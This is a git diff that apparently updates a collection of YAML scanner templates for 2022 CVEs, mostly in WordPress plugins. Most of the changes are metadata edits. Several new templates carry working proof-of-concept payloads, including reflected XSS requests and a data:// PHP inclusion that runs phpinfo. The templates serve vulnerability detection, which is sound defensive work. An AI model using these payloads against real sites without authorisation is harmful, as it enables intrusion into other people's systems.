   - raw:
diff --git a/cves/2022/CVE-2022-0201.yaml b/cves/2022/CVE-2022-0201.yaml
index d2f16831be..b69da0b65f 100644
--- a/cves/2022/CVE-2022-0201.yaml
+++ b/cves/2022/CVE-2022-0201.yaml
@@ -1,18 +1,20 @@
 id: CVE-2022-0201
 
 info:
-  name: WordPress Permalink Manager < 2.2.15 - Reflected Cross-Site Scripting
+  name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugins do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue.
+  description: |
+    WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
   reference:
     - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
-  tags: cve,cve2022,xss,wordpress,wp-plugin
+    - https://plugins.trac.wordpress.org/changeset/2656512
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
+    cvss-score: 6.1
     cve-id: CVE-2022-0201
     cwe-id: CWE-79
+  tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress
 
 requests:
   - method: GET
@@ -31,4 +33,6 @@ requests:
       - type: word
         part: header
         words:
-          - text/html
\ No newline at end of file
+          - text/html
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0208.yaml b/cves/2022/CVE-2022-0208.yaml
index 4ede2bc761..29da10141b 100644
--- a/cves/2022/CVE-2022-0208.yaml
+++ b/cves/2022/CVE-2022-0208.yaml
@@ -1,19 +1,20 @@
 id: CVE-2022-0208
 
 info:
-  name: WordPress Plugin MapPress < 2.73.4 - Reflected XSS
+  name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting.
+  description: |
+    WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0208
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0208
     cwe-id: CWE-79
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0208
-    - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
-  tags: cve,cve2022,mappress,xss,wordpress,wp-plugin
+  tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve
 
 requests:
   - method: GET
@@ -36,4 +37,6 @@ requests:
         words:
           - "<img src onerror=alert(document.domain)>"
           - "Bad mapid"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/09/08
diff --git a/cves/2022/CVE-2022-0218.yaml b/cves/2022/CVE-2022-0218.yaml
index c7c914df73..ef3d714ef8 100644
--- a/cves/2022/CVE-2022-0218.yaml
+++ b/cves/2022/CVE-2022-0218.yaml
@@ -9,6 +9,7 @@ info:
     - https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
     - https://wordpress.org/plugins/wp-html-mail/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0218
+    - https://plugins.trac.wordpress.org/changeset/2656984/wp-html-mail/trunk/includes/class-template-designer.php
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2022/CVE-2022-0220.yaml b/cves/2022/CVE-2022-0220.yaml
new file mode 100644
index 0000000000..42f86ce161
--- /dev/null
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -0,0 +1,53 @@
+id: CVE-2022-0220
+
+info:
+  name: WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: |
+    WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
+  reference:
+    - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0220
+  remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0220
+    cwe-id: CWE-79
+  tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,unauth
+
+requests:
+  - raw:
+      - |
+        GET /wp-admin HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
+
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_2, 'text/html')"
+          - "status_code_2 == 200"
+          - "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - 'nonce":"([0-9a-z]+)'
+        internal: true
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0271.yaml b/cves/2022/CVE-2022-0271.yaml
index 509d4c8894..45edb306c5 100644
--- a/cves/2022/CVE-2022-0271.yaml
+++ b/cves/2022/CVE-2022-0271.yaml
@@ -1,19 +1,21 @@
 id: CVE-2022-0271
 
 info:
-  name: LearnPress < 4.1.6 - Reflected Cross-Site Scripting
+  name: LearnPress <4.1.6 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not sanitise and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action, leading to a Reflected Cross-Site Scripting
+  description: |
+    WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.
   reference:
     - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0271
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0271
     cwe-id: CWE-79
-  tags: xss,wp,wp-plugin,wordpress,cve,cve2022,learnpress
+  tags: wp,wp-plugin,wordpress,cve,cve2022,learnpress,wpscan,xss
 
 requests:
   - method: GET
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0281.yaml b/cves/2022/CVE-2022-0281.yaml
index cb9e25d744..e0c898ff3b 100644
--- a/cves/2022/CVE-2022-0281.yaml
+++ b/cves/2022/CVE-2022-0281.yaml
@@ -7,6 +7,8 @@ info:
   description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0281
+    - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6
+    - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -14,7 +16,7 @@ info:
     cwe-id: CWE-200
   metadata:
     shodan-query: http.favicon.hash:780351152
-  tags: cve,cve2022,microweber,disclosure
+  tags: cve,cve2022,microweber,disclosure,huntr
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-0288.yaml b/cves/2022/CVE-2022-0288.yaml
index 848b9817c8..16085e702d 100644
--- a/cves/2022/CVE-2022-0288.yaml
+++ b/cves/2022/CVE-2022-0288.yaml
@@ -1,19 +1,21 @@
 id: CVE-2022-0288
 
 info:
-  name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
+  name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
-  description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
-  remediation: Fixed in version 2.7.12
+  description: |
+    WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.
   reference:
     - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0288
+  remediation: Fixed in version 2.7.12
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
+    cvss-score: 6.1
     cve-id: CVE-2022-0288
     cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,xss
+  tags: wordpress,xss,wpscan,cve,cve2022
 
 requests:
   - method: POST
@@ -43,4 +45,6 @@ requests:
       - type: word
         part: header
         words:
-          - "text/html"
\ No newline at end of file
+          - "text/html"
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0346.yaml b/cves/2022/CVE-2022-0346.yaml
new file mode 100644
index 0000000000..415c6e423a
--- /dev/null
+++ b/cves/2022/CVE-2022-0346.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-0346
+
+info:
+  name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: |
+    WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
+  reference:
+    - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
+    - https://wordpress.org/plugins/www-xml-sitemap-generator-org/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0346
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0346
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
+      - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
+          - "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0378.yaml b/cves/2022/CVE-2022-0378.yaml
index 2b1e087f0c..9cce944e5f 100644
--- a/cves/2022/CVE-2022-0378.yaml
+++ b/cves/2022/CVE-2022-0378.yaml
@@ -1,12 +1,14 @@
 id: CVE-2022-0378
 
 info:
-  name: Microweber Reflected Cross-Site Scripting
+  name: Microweber Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0378
+    - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
+    - https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
     cvss-score: 5.4
@@ -14,7 +16,7 @@ info:
     cwe-id: CWE-79
   metadata:
     shodan-query: http.favicon.hash:780351152
-  tags: cve,cve2022,microweber,xss
+  tags: cve,cve2022,microweber,xss,huntr
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml
index 69f2f89ba7..a724d37b78 100644
--- a/cves/2022/CVE-2022-0381.yaml
+++ b/cves/2022/CVE-2022-0381.yaml
@@ -1,14 +1,15 @@
 id: CVE-2022-0381
 
 info:
-  name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS
+  name: WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file
-    which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0.
+  description: |
+    WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page.
   reference:
+    - https://gist.github.com/Xib3rR4dAr/4b3ea7960914e23c3a875b973a5b37a3
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-0381
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0381
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,4 +36,6 @@ requests:
       - type: word
         part: body
         words:
-          - "url: \"xss://\"-alert(document.domain)"
\ No newline at end of file
+          - "url: \"xss://\"-alert(document.domain)"
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0422.yaml b/cves/2022/CVE-2022-0422.yaml
index f00ac17f5f..2593d09fd5 100644
--- a/cves/2022/CVE-2022-0422.yaml
+++ b/cves/2022/CVE-2022-0422.yaml
@@ -1,20 +1,21 @@
 id: CVE-2022-0422
 
 info:
-  name: WordPress White Label MS < 2.2.9 - Reflected Cross-Site Scripting
+  name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting
   author: random-robbie
   severity: medium
-  description: The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue
-    back in the response, leading to reflected cross-site scripting.
+  description: |
+    WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.
   reference:
     - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0422
-  tags: cve,cve2022,wordpress,xss,wp-plugin
+    - https://plugins.trac.wordpress.org/changeset/2672615
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0422
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
+    cvss-score: 6.1
     cve-id: CVE-2022-0422
     cwe-id: CWE-79
+  tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan
 
 requests:
   - raw:
@@ -44,4 +45,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0432.yaml b/cves/2022/CVE-2022-0432.yaml
index d5e6582033..ca1151f580 100644
--- a/cves/2022/CVE-2022-0432.yaml
+++ b/cves/2022/CVE-2022-0432.yaml
@@ -9,12 +9,13 @@ info:
     - https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09
     - https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0432
+    - https://huntr.dev/bounties/d06da292-7716-4d74-a129-dd04773398d7
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0432
     cwe-id: CWE-1321
-  tags: cve,cve2022,mastodon,prototype
+  tags: mastodon,prototype,huntr,cve,cve2022
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-0437.yaml b/cves/2022/CVE-2022-0437.yaml
index 24dedd6f3d..358ed67faf 100644
--- a/cves/2022/CVE-2022-0437.yaml
+++ b/cves/2022/CVE-2022-0437.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2022-0437
     cwe-id: CWE-79
-  tags: cve,cve2022,karma,xss,oss
+  tags: oss,huntr,cve,cve2022,karma,xss
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-0482.yaml b/cves/2022/CVE-2022-0482.yaml
index b450d39490..7ee41afa5e 100644
--- a/cves/2022/CVE-2022-0482.yaml
+++ b/cves/2022/CVE-2022-0482.yaml
@@ -1,22 +1,22 @@
 id: CVE-2022-0482
 
 info:
-  name: Easy!Appointments Broken Access Control
+  name: Easy!Appointments <1.4.3 - Broken Access Control
   author: francescocarlucci,opencirt
   severity: critical
   description: |
-    Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.
+    Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.
   reference:
     - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
     - https://github.com/alextselegidis/easyappointments
     - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cve-id: CVE-2022-0482
     cwe-id: CWE-863
-  tags: cve,cve2022,easyappointments
+  tags: cve,cve2022,easyappointments,huntr
 
 requests:
   - raw:
@@ -53,3 +53,5 @@ requests:
           - '"appointments":'
           - '"unavailables":'
         condition: and
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-0540.yaml b/cves/2022/CVE-2022-0540.yaml
index 5e0d089bbb..ad50fa4868 100644
--- a/cves/2022/CVE-2022-0540.yaml
+++ b/cves/2022/CVE-2022-0540.yaml
@@ -1,23 +1,24 @@
 id: CVE-2022-0540
 
 info:
-  name: Atlassian Jira Seraph- Authentication Bypass
+  name: Atlassian Jira Seraph - Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |
-    A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
+    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
   reference:
     - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
     - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
+  remediation: Ensure you are using the latest version and that all security patches have been applied.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0540
+    cwe-id: CWE-287
   metadata:
     shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.80
-    cve-id: CVE-2022-0540
-    cwe-id: CWE-287
 
 requests:
   - method: GET
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-0543.yaml b/cves/2022/CVE-2022-0543.yaml
index 782ad01f37..d26e91ee2f 100644
--- a/cves/2022/CVE-2022-0543.yaml
+++ b/cves/2022/CVE-2022-0543.yaml
@@ -1,26 +1,26 @@
 id: CVE-2022-0543
 
 info:
-  name: Redis Sandbox Escape RCE
+  name: Redis Sandbox Escape - Remote Code Execution
   author: dwisiswant0
   severity: critical
-  reference:
-    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
-    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
   description: |
     This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
     vulnerability was introduced by Debian and Ubuntu Redis packages that
     insufficiently sanitized the Lua environment. The maintainers failed to
     disable the package interface, allowing attackers to load arbitrary libraries.
-
-    Taken from rapid7/metasploit-framework#16504.
-  metadata:
-    shodan-query: "redis_version"
+  reference:
+    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
+    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
+    - https://bugs.debian.org/1005787
+    - https://www.debian.org/security/2022/dsa-5081
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.00
+    cvss-score: 10
     cve-id: CVE-2022-0543
-  tags: cve,cve2022,network,redis,unauth,rce
+  metadata:
+    shodan-query: redis_version
+  tags: cve,cve2022,network,redis,unauth,rce,kev
 
 network:
   - inputs:
@@ -35,3 +35,5 @@ network:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-0591.yaml b/cves/2022/CVE-2022-0591.yaml
index 63be423ad1..0bfdd570a4 100644
--- a/cves/2022/CVE-2022-0591.yaml
+++ b/cves/2022/CVE-2022-0591.yaml
@@ -1,14 +1,14 @@
 id: CVE-2022-0591
 
 info:
-  name: Formcraft3 < 3.8.28 - Unauthenticated SSRF
+  name: Formcraft3 <3.8.28 - Server-Side Request Forgery
   author: Akincibor
   severity: critical
-  description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users.
+  description: Formcraft3 before version 3.8.2  does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
   reference:
     - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
-  tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3
+  tags: wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.10
@@ -25,3 +25,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
new file mode 100644
index 0000000000..6b8297435d
--- /dev/null
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-0594
+
+info:
+  name: Shareaholic < 9.7.6 - Information Disclosure
+  author: atomiczsec
+  severity: medium
+  description: The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v < 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc.
+  reference:
+    - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1
+    - https://wordpress.org/plugins/shareaholic/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0594
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-0594
+    cwe-id: CWE-863
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - 'plugin_version'
+          - 'shareaholic_server_reachable'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-0595.yaml b/cves/2022/CVE-2022-0595.yaml
index 6255b3f654..85f16ad2ee 100644
--- a/cves/2022/CVE-2022-0595.yaml
+++ b/cves/2022/CVE-2022-0595.yaml
@@ -1,18 +1,20 @@
 id: CVE-2022-0595
 
 info:
-  name: Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS
+  name: WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting
   author: akincibor
   severity: medium
-  description: The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue.
+  description: |
+    WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.
   reference:
     - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de
-  tags: cve,cve2022,xss,wordpress,wp-plugin
+    - https://plugins.trac.wordpress.org/changeset/2686614
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.40
+    cvss-score: 5.4
     cve-id: CVE-2022-0595
     cwe-id: CWE-79
+  tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth
 
 requests:
   - raw:
@@ -51,3 +53,5 @@ requests:
           - 'contains(body_2, "alert(document.domain)")'
           - 'status_code_2 == 200'
         condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0599.yaml b/cves/2022/CVE-2022-0599.yaml
new file mode 100644
index 0000000000..b1a73d1aa8
--- /dev/null
+++ b/cves/2022/CVE-2022-0599.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-0599
+
+info:
+  name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting
+  author: scent2d
+  severity: medium
+  description: |
+    WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.
+  reference:
+    - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765
+    - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0599
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0599
+    cwe-id: CWE-79
+  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg/onload=alert(document.domain)> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />'
+
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(all_headers_2, "text/html")'
+        condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0653.yaml b/cves/2022/CVE-2022-0653.yaml
index 69cec2611a..97a429face 100644
--- a/cves/2022/CVE-2022-0653.yaml
+++ b/cves/2022/CVE-2022-0653.yaml
@@ -9,9 +9,13 @@ info:
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
